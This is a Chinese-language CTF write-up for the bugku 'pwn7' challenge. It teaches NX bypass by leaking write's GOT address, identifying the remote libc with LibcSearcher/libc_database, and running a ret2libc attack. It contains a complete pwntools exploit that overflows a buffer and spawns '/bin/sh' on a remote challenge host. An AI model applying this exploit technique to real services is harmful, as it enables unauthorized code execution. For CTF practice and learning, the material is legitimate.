前言:
繼續PWN的學習,今天整理一下繞過NX,同時libc本地不存在需要通過相應函數泄露地址的方式進行進行溢出。
本題工具介紹:
-
LibcSearcher
一個基於libc_database寫的python庫,可以通過泄露的函數實際地址查找對應的libc版本。
from LibcSearcher import *
#第二個參數,爲已泄露的實際地址,或最後12位(比如:d90),int類型
obj = LibcSearcher("fgets", 0X7ff39014bd90)
obj.dump("system") #system 偏移
obj.dump("str_bin_sh") #/bin/sh 偏移
obj.dump("__libc_start_main_ret")
本題 通過write函數實際地址找到遠程的libc,然後dump出其他函數的offset。
-
libc_database
./add 用來添加libc庫
./add /usr/lib/libc-2.21.so
./find 用來查找libc版本
$ ./find printf 260
archive-glibc (id libc6_2.19-10ubuntu2_i386)
./dump 用來輸出libc中的一些函數的偏移
$ ./dump libc6_2.19-0ubuntu6.6_i386
offset___libc_start_main_ret = 0x19a83
offset_system = 0x00040190
offset_dup2 = 0x000db590
offset_recv = 0x000ed2d0
offset_str_bin_sh = 0x160a24
本題找到遠程加載的libc版本後使用此工具dump出其他函數的offset。
題目:(new bugku pwn7)
檢查程序詳細信息,發現爲32bit,開啓着NX,同時 RELRO: Partial RELRO。
放入IDA中靜態分析,發現read()危險函數,主函數有write函數:
此題目思路:使用wirte函數泄露出(wirte/__libc_start_main)等實際地址,查找對應的libc動態鏈接庫,通過此庫查找系統函數的偏移,計算相應的實際地址,溢出即可。構造payload如下:
from pwn import *
context.log_level = "debug"
#p = process('./pwn7')
p = remote('114.116.54.89',10007)
elf = ELF('./pwn7')
write_plt = elf.plt['write']
write_got = elf.got['write']
print write_got
libc_start_main_got = elf.got['__libc_start_main']
main_addr = 0x0804846B
offset_write = 0x000d43c0
offset_system = 0x0003a940
offset_str_bin_sh = 0x15902b
payload = 'A' * 40 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendlineafter('plz input your name:\n',payload)
write_addr = u32(p.recv(4))
libc_base = write_addr - offset_write
sys_addr = libc_base + offset_system
sh_addr = libc_base + offset_str_bin_sh
payload = 'A' * 40 + p32(sys_addr) + 'nEIP' + p32(sh_addr)
p.sendline(payload)
p.interactive()
腳本運行結果如下:
注:常用的32bit帶參溢出的方式中會使用4byte代替PUSH EIP來騙過CPU,但是此軟件要通過溢出泄露出write函數的實際地址後繼續溢出,那麼就需要將返回地址填充想要繼續執行的指令的地址;
針對本地的調用wirte@plt函數,在構造參數的時候是p32(1) + p32(write_got) +p32(4)作爲write函數的參數,其中“1”表示的是標準輸出,而0代表標準輸入。“4”代表4字節。
總結:
- 關於繞過NX的方式:
- 軟件有system函數的直接用;
- 程序自帶libc,直接elf.symbols['system'] elf.search(''/bin/sh)或使用one_gadgat構造ROP鏈;
- 需要泄露遠端libc版本,一般使用puts/write泄露地址,計算基地址。